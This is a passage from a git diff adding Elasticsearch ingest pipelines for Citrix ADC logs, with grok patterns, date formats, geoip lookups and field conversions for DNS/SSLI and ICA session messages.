ctx.event?.timezone == null || ctx.event?.timezone == "" + - date: + if: ctx._tmp?.timestamp8601 != null + tag: date_tmp_timestamp8601 + field: _tmp.timestamp8601 + timezone: '{{{event.timezone}}}' + formats: + - ISO8601 + - set: + field: _tmp.timestamp + tag: set_tmp_timestamp + if: ctx._tmp?.timestamp != null && ctx.citrix?.event_year != null + value: "{{{citrix.event_year}}} {{{_tmp.timestamp}}}" + - date: + if: ctx._tmp?.timestamp != null + tag: date_tmp_timestamp + field: _tmp.timestamp + timezone: '{{{event.timezone}}}' + formats: + - MMM d HH:mm:ss + - MMM d HH:mm:ss + - MMM dd HH:mm:ss + - MMMM d HH:mm:ss + - MMMM d HH:mm:ss + - MMMM dd HH:mm:ss + - yyyy MMM d HH:mm:ss + - yyyy MMM d HH:mm:ss + - yyyy MMM dd HH:mm:ss + - yyyy MMMM d HH:mm:ss + - yyyy MMMM d HH:mm:ss + - yyyy MMMM dd HH:mm:ss + - date: + if: ctx._tmp?.timestamp_native != null + tag: date_tmp_timestamp_native + field: _tmp.timestamp_native + formats: + - MM/dd/yyyy:HH:mm:ss + - yyyy/MM/dd:HH:mm:ss + timezone: '{{{event.timezone}}}' + - remove: + field: citrix.event_year + tag: remove_event_year + ignore_missing: true + - geoip: + field: client.ip + tag: geoip_client_ip_to_client_geo + target_field: client.geo + ignore_missing: true + - geoip: + field: source.ip + tag: geoip_source_ip_to_source_geo + target_field: source.geo + ignore_missing: true + # IP Autonomous System (AS) Lookup + - geoip: + database_file: GeoLite2-ASN.mmdb + tag: geoip_source_ip_to_source_as + field: source.ip + target_field: source.as + properties: + - asn + - organization_name + ignore_missing: true + - geoip: + database_file: GeoLite2-ASN.mmdb + tag: geoip_client_ip_to_client_as + field: client.ip + target_field: client.as + properties: + - asn + - organization_name + ignore_missing: true + - rename: + field: source.as.asn + tag: rename_source_as_asn + target_field: source.as.number + ignore_missing: true + - rename: + field: source.as.organization_name + tag: rename_source_as_organization_name + target_field: source.as.organization.name + ignore_missing: true + - rename: + field: client.as.asn + tag: rename_client_as_asn + target_field: client.as.number + ignore_missing: true + - rename: + field: client.as.organization_name + tag: rename_client_as_organization_name + target_field: client.as.organization.name + ignore_missing: true + - uri_parts: + field: url.original + tag: uri_parts_url_original + target_field: url + if: ctx.url?.original != null && ctx.url?.original != "" + - script: + description: Drops null/empty values recursively + tag: drop_empty_fields + lang: painless + source: | + boolean dropEmptyFields(Object object) { + if (object == null || object == "") { + return true; + } else if (object instanceof Map) { + ((Map) object).values().removeIf(value -> dropEmptyFields(value)); + return (((Map) object).size() == 0); + } else if (object instanceof List) { + ((List) object).removeIf(value -> dropEmptyFields(value)); + return (((List) object).length == 0); + } + return false; + } + dropEmptyFields(ctx); + - remove: + field: event.original + tag: remove_event_original + if: ctx.tags == null || !(ctx.tags.contains('preserve_original_event')) + ignore_missing: true + - remove: + field: + - _tmp + - _conf + tag: remove_tmp_and_conf + ignore_missing: true +on_failure: + - remove: + field: + - _tmp + - _conf + tag: remove_tmp_and_conf + ignore_missing: true + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: event.kind + tag: set_pipeline_error_to_event_kind + value: pipeline_error diff --git a/packages/citrix_adc/data_stream/log/elasticsearch/ingest_pipeline/dns_and_ssli_feature.yml b/packages/citrix_adc/data_stream/log/elasticsearch/ingest_pipeline/dns_and_ssli_feature.yml new file mode 100644 index 00000000000..cf8afc4a5d7 --- /dev/null +++ b/packages/citrix_adc/data_stream/log/elasticsearch/ingest_pipeline/dns_and_ssli_feature.yml @@ -0,0 +1,105 @@ +--- +description: Pipeline for Citrix Native messages of DNS and SSLI feature. +processors: + - grok: + description: Extract fields from message of DNS and SSLI feature. + tag: grok_dns_and_ssli_feature + field: citrix.extended.message + patterns: + - '^Source %{IP:citrix_adc.log.source.ip}:%{INT:citrix_adc.log.source.port} - Destination %{IP:citrix_adc.log.destination.ip}:%{INT:citrix_adc.log.destination.port} User%{SPACE}:%{SPACE}%{DATA:citrix_adc.log.user} - Domain%{SPACE}:%{SPACE}%{DATA:citrix_adc.log.domain} - Category%{SPACE}:%{SPACE}%{INT:citrix_adc.log.category} Action%{SPACE}:%{SPACE}%{WORD:citrix_adc.log.action} - Reason%{SPACE}:%{SPACE}%{GREEDYDATA:citrix_adc.log.reason}$' + - '%{GREEDYDATA:citrix_adc.log.message}' + ignore_failure: true + - convert: + field: citrix_adc.log.destination.ip + tag: convert_destination_ip_to_ip + type: ip + ignore_missing: true + if: ctx.citrix_adc?.log?.destination?.ip != null && ctx.citrix_adc.log.destination.ip != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: destination.ip + tag: set_destination_ip_from_destination_ip + copy_from: citrix_adc.log.destination.ip + ignore_empty_value: true + - convert: + field: citrix_adc.log.destination.port + tag: convert_destination_port_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: destination.port + tag: set_destination_port_from_destination_port + copy_from: citrix_adc.log.destination.port + ignore_empty_value: true + - set: + field: event.action + tag: set_event_action_from_action + copy_from: citrix_adc.log.action + ignore_empty_value: true + - set: + field: event.reason + tag: set_event_reason_from_reason + copy_from: citrix_adc.log.reason + ignore_empty_value: true + - convert: + field: citrix_adc.log.source.ip + tag: convert_source_ip_to_ip + type: ip + ignore_missing: true + if: ctx.citrix_adc?.log?.source?.ip != null && ctx.citrix_adc.log.source.ip != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: source.ip + tag: set_source_ip_from_source_ip + copy_from: citrix_adc.log.source.ip + ignore_empty_value: true + - convert: + field: citrix_adc.log.source.port + tag: convert_source_port_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: source.port + tag: set_source_port_from_source_port + copy_from: citrix_adc.log.source.port + ignore_empty_value: true + - set: + field: user.domain + tag: set_user_domain_from_domain + copy_from: citrix_adc.log.domain + ignore_empty_value: true + - set: + field: user.name + tag: set_user_name_from_user + copy_from: citrix_adc.log.user + ignore_empty_value: true + - convert: + field: citrix_adc.log.category + tag: convert_category_to_string + type: string + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' +on_failure: + - set: + field: event.kind + value: pipeline_error + - append: + field: error.message + value: '{{{ _ingest.on_failure_message }}}' diff --git a/packages/citrix_adc/data_stream/log/elasticsearch/ingest_pipeline/ica_feature.yml b/packages/citrix_adc/data_stream/log/elasticsearch/ingest_pipeline/ica_feature.yml new file mode 100644 index 00000000000..91ebb93ff81 --- /dev/null +++ b/packages/citrix_adc/data_stream/log/elasticsearch/ingest_pipeline/ica_feature.yml @@ -0,0 +1,557 @@ +--- +description: Pipeline for Citrix Native messages of ICA feature. +processors: + - grok: + description: Extract fields from message of ICA feature. + tag: grok_ica_feature + field: citrix.extended.message + patterns: + - '^session_guid %{WORD:citrix_adc.log.session_guid} - device_serial_number %{NUMBER:citrix_adc.log.device_serial_number:int} - client_cookie%{SPACE}:%{SPACE}%{WORD:citrix_adc.log.client_cookie} - flags %{NUMBER:citrix_adc.log.flags:int} - session_setup_time %{DATA:citrix_adc.log.session_setup_time} - client_ip %{IP:citrix_adc.log.client_ip} - client_type %{NUMBER:citrix_adc.log.client_type:int} - client_launcher %{NUMBER:citrix_adc.log.client_launcher:int} - client_version %{DATA:citrix_adc.log.client_version} - client_hostname %{DATA:citrix_adc.log.client_hostname} - domain_name %{DATA:citrix_adc.log.domain_name} - server_name %{DATA:citrix_adc.log.server.name} - connection_priority %{NUMBER:citrix_adc.log.connection_priority:int} - access_type %{NUMBER:citrix_adc.log.access_type:int} - status %{NUMBER:citrix_adc.log.status:int} - username %{USERNAME:citrix_adc.log.username}$' + - '^session_guid %{WORD:citrix_adc.log.session_guid} - device_serial_number %{NUMBER:citrix_adc.log.device_serial_number:int} - client_cookie %{WORD:citrix_adc.log.client_cookie} - flags %{NUMBER:citrix_adc.log.flags:int} - channel_update_begin %{DATA:citrix_adc.log.channel_update.begin} - channel_update_end %{DATA:citrix_adc.log.channel_update.end} - channel_id_1 %{NUMBER:citrix_adc.log.channel_id_1:int} - channel_id_1_val %{NUMBER:citrix_adc.log.channel_id_1_val:int} - channel_id_2 %{NUMBER:citrix_adc.log.channel_id_2:int} - channel_id_2_val %{NUMBER:citrix_adc.log.channel_id_2_val:int} - channel_id_3 %{NUMBER:citrix_adc.log.channel_id_3:int} - channel_id_3_val %{NUMBER:citrix_adc.log.channel_id_3_val:int} - channel_id_4 %{NUMBER:citrix_adc.log.channel_id_4:int} - channel_id_4_val %{NUMBER:citrix_adc.log.channel_id_4_val:int} - channel_id_5 %{NUMBER:citrix_adc.log.channel_id_5:int} - channel_id_5_val %{NUMBER:citrix_adc.log.channel_id_5_val:int}$' + - '^session_guid %{WORD:citrix_adc.log.session_guid} - device_serial_number %{NUMBER:citrix_adc.log.device_serial_number:int} - client_cookie %{WORD:citrix_adc.log.client_cookie} - flags %{NUMBER:citrix_adc.log.flags:int} - nsica_session_status %{NUMBER:citrix_adc.log.nsica_session.status:int} - nsica_session_client_ip %{IP:citrix_adc.log.nsica_session.client.ip} - nsica_session_client_port %{NUMBER:citrix_adc.log.nsica_session.client.port:int} - nsica_session_server_ip %{IP:citrix_adc.log.nsica_session.server.ip} - nsica_session_server_port %{NUMBER:citrix_adc.log.nsica_session.server.port:int} - nsica_session_reconnect_count %{NUMBER:citrix_adc.log.nsica_session.reconnect_count:int} - nsica_session_acr_count %{NUMBER:citrix_adc.log.nsica_session.acr_count:int} - connection_priority %{NUMBER:citrix_adc.log.connection_priority:int} - timestamp %{DATA:citrix_adc.log.timestamp} -$' + - '^session_guid %{WORD:citrix_adc.log.session_guid} - device_serial_number %{NUMBER:citrix_adc.log.device_serial_number:int} - client_cookie %{WORD:citrix_adc.log.client_cookie} - flags %{NUMBER:citrix_adc.log.flags:int} - nsica_status %{NUMBER:citrix_adc.log.nsica_status:int} - L7LatencyThresholdFactor %{NUMBER:citrix_adc.log.l7_latency.threshold_factor:int} - L7LatencyWaittime %{NUMBER:citrix_adc.log.l7_latency.waittime:int} - L7LatencyNotifyInterval %{NUMBER:citrix_adc.log.l7_latency.notify_interval:int} - L7LatencyMaxNotifyCount %{NUMBER:citrix_adc.log.l7_latency.max_notify_count:int} - L7ThresholdBreachAvgClientsideLatency %{NUMBER:citrix_adc.log.l7_threshold_breach.avg_clientside_latency:int} - L7ThresholdBreachMaxClientsideLatency %{NUMBER:citrix_adc.log.l7_threshold_breach.max_clientside_latency:int} - L7ThresholdBreachAvgServersideLatency %{NUMBER:citrix_adc.log.l7_threshold_breach.avg_serverside_latency:int} - L7ThresholdBreachMaxServersideLatency %{NUMBER:citrix_adc.log.l7_threshold_breach.max_serverside_latency:int} - MinL7Latency %{NUMBER:citrix_adc.log.min_l7_latency:int} -$' + - '^session_guid %{WORD:citrix_adc.log.session_guid} - device_serial_number %{NUMBER:citrix_adc.log.device_serial_number:int} - client_cookie %{WORD:citrix_adc.log.client_cookie} - flags %{NUMBER:citrix_adc.log.flags:int} - session_end_time %{DATA:citrix_adc.log.session_end_time}$' + - '^session_guid %{WORD:citrix_adc.log.session_guid} - device_serial_number %{NUMBER:citrix_adc.log.device_serial_number:int} - client_cookie %{WORD:citrix_adc.log.client_cookie} - flags %{NUMBER:citrix_adc.log.flags:int} - ica_rtt %{NUMBER:citrix_adc.log.ica_rtt:int} - clientside_rxbytes %{NUMBER:citrix_adc.log.clientside.rxbytes:int} - clientside_txbytes %{NUMBER:citrix_adc.log.clientside.txbytes:int} - clientside_packet_retransmits %{NUMBER:citrix_adc.log.clientside.packet_retransmits:int} - serverside_packet_retransmits %{NUMBER:citrix_adc.log.serverside.packet_retransmits:int} - clientside_rtt %{NUMBER:citrix_adc.log.clientside.rtt:int} - serverside_rtt %{NUMBER:citrix_adc.log.serverside.rtt:int} - clientside_jitter %{NUMBER:citrix_adc.log.clientside.jitter:int} - serverside_jitter %{NUMBER:citrix_adc.log.serverside.jitter:int}$' + - '^session_guid %{WORD:citrix_adc.log.session_guid} - device_serial_number %{NUMBER:citrix_adc.log.device_serial_number:int} - client_cookie %{WORD:citrix_adc.log.client_cookie} - flags %{NUMBER:citrix_adc.log.flags:int} - startup_duration %{NUMBER:citrix_adc.log.startup_duration:int} - launch_mechanism %{NUMBER:citrix_adc.log.launch_mechanism:int} - app_launch_time %{DATA:citrix_adc.log.app.launch_time} - app_process_id %{NUMBER:citrix_adc.log.app.process_id:int} - app_name %{DATA:citrix_adc.log.app.name} - module_path %{GREEDYDATA:citrix_adc.log.module_path}$' + - '^session_guid %{WORD:citrix_adc.log.session_guid} - device_serial_number %{NUMBER:citrix_adc.log.device_serial_number:int} - client_cookie %{WORD:citrix_adc.log.client_cookie} - flags %{NUMBER:citrix_adc.log.flags:int} - app_termination_type %{NUMBER:citrix_adc.log.app.termination_type:int} - app_process_id %{NUMBER:citrix_adc.log.app.process_id:int} - app_termination_time %{DATA:citrix_adc.log.app.termination_time}$' + - '%{GREEDYDATA:citrix_adc.log.message}' + ignore_failure: true + - convert: + field: citrix_adc.log.client_ip + tag: convert_client_ip_to_ip + type: ip + ignore_missing: true + if: ctx.citrix_adc?.log?.client_ip != null && ctx.citrix_adc?.log.client_ip != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: client.ip + tag: set_client_ip_from_client_ip + copy_from: citrix_adc.log.client_ip + ignore_empty_value: true + - date: + field: citrix_adc.log.timestamp + tag: date_timestamp + target_field: citrix_adc.log.timestamp + formats: + - UNIX + - ISO8601 + - MM/dd/yyyy:HH:mm:ss + - MMM d HH:mm:ss + - MMM d HH:mm:ss + - MMM dd HH:mm:ss + - MMMM d HH:mm:ss + - MMMM d HH:mm:ss + - MMMM dd HH:mm:ss + - yyyy MMM d HH:mm:ss + - yyyy MMM d HH:mm:ss + - yyyy MMM dd HH:mm:ss + - yyyy MMMM d HH:mm:ss + - yyyy MMMM d HH:mm:ss + - yyyy MMMM dd HH:mm:ss + if: ctx.citrix_adc?.log?.timestamp != null && ctx.citrix_adc.log.timestamp != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.clientside.rxbytes + tag: convert_clientside_rxbytes_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: destination.bytes + tag: set_destination_bytes_from_clientside_rxbytes + copy_from: citrix_adc.log.clientside.rxbytes + ignore_empty_value: true + - convert: + field: citrix_adc.log.nsica_session.server.ip + tag: convert_destination_ip_to_ip + type: ip + ignore_missing: true + if: ctx.citrix_adc?.log?.nsica_session?.server?.ip != null && ctx.citrix_adc.log.nsica_session.server.ip != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: destination.ip + tag: set_destination_ip_from_nsica_session_server_ip + copy_from: citrix_adc.log.nsica_session.server.ip + ignore_empty_value: true + - convert: + field: citrix_adc.log.nsica_session.server.port + tag: convert_nsica_session_server_port_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: destination.port + tag: set_destination_ip_from_nsica_session_server_port + copy_from: citrix_adc.log.nsica_session.server.port + ignore_empty_value: true + - convert: + field: citrix_adc.log.clientside.txbytes + tag: convert_clientside_txbytes_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: source.bytes + tag: set_source_bytes_from_clientside_txbytes + copy_from: citrix_adc.log.clientside.txbytes + ignore_empty_value: true + - convert: + field: citrix_adc.log.nsica_session.client.ip + tag: convert_nsica_session_client_ip_to_ip + type: ip + ignore_missing: true + if: ctx.citrix_adc?.log?.nsica_session?.client?.ip != null && ctx.citrix_adc?.log.nsica_session.client.ip != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: source.ip + tag: set_source_ip_from_nsica_session_client_ip + copy_from: citrix_adc.log.nsica_session.client.ip + ignore_empty_value: true + - convert: + field: citrix_adc.log.nsica_session.client.port + tag: convert_nsica_session_client_port_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: source.port + tag: set_source_port_from_nsica_session_client_port + copy_from: citrix_adc.log.nsica_session.client.port + ignore_empty_value: true + - set: + field: user.domain + tag: set_user_domain_from_domain_name + copy_from: citrix_adc.log.domain_name + ignore_empty_value: true + - set: + field: user.name + tag: set_user_name_from_username + copy_from: citrix_adc.log.username + ignore_empty_value: true + - convert: + field: citrix_adc.log.device_serial_number + tag: convert_device_serial_number_to_string + type: string + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.flags + tag: convert_flags_to_string + type: string + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.nsica_session.status + tag: convert_nsica_session_status_to_string + type: string + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.access_type + tag: convert_access_type_to_string + type: string + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.app.termination_type + tag: convert_app_termination_type_to_string + type: string + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.client_launcher + tag: convert_client_launcher_to_string + type: string + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.client_type + tag: convert_client_type_to_string + type: string + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.client_version + tag: convert_client_version_to_string + type: string + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.connection_priority + tag: convert_connection_priority_to_string + type: string + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.launch_mechanism + tag: convert_launch_mechanism_to_string + type: string + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.status + tag: convert_status_to_string + type: string + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.channel_id_1 + tag: convert_channel_id_1_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.channel_id_1_val + tag: convert_channel_id_1_val_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.channel_id_2 + tag: convert_channel_id_2_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.channel_id_2_val + tag: convert_channel_id_2_val_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.channel_id_3 + tag: convert_channel_id_3_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.channel_id_3_val + tag: convert_channel_id_3_val_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.channel_id_4 + tag: convert_channel_id_4_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.channel_id_4_val + tag: convert_channel_id_4_val_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.channel_id_5 + tag: convert_channel_id_5_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.channel_id_5_val + tag: convert_channel_id_5_val_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.nsica_session.reconnect_count + tag: convert_nsica_session_reconnect_count_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.nsica_session.acr_count + tag: convert_nsica_session_acr_count_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.nsica_status + tag: convert_nsica_status_to_string + type: string + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.l7_latency.max_notify_count + tag: convert_l7_latency_max_notify_count_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.l7_latency.notify_interval + tag: convert_l7_latency_notify_interval_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.l7_latency.threshold_factor + tag: convert_l7_latency_threshold_factor_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - date: + field: citrix_adc.log.l7_latency.waittime + tag: date_l7_latency_waittime + target_field: citrix_adc.log.l7_latency.waittime + formats: + - UNIX + if: ctx.citrix_adc?.log?.l7_latency?.waittime != null && ctx.citrix_adc.log.l7_latency.waittime != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.l7_threshold_breach.avg_clientside_latency + tag: convert_l7_threshold_breach_avg_clientside_latency_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.l7_threshold_breach.avg_serverside_latency + tag: convert_l7_threshold_breach_avg_serverside_latency_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.l7_threshold_breach.max_clientside_latency + tag: convert_l7_threshold_breach_max_clientside_latency_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.l7_threshold_breach.max_serverside_latency + tag: 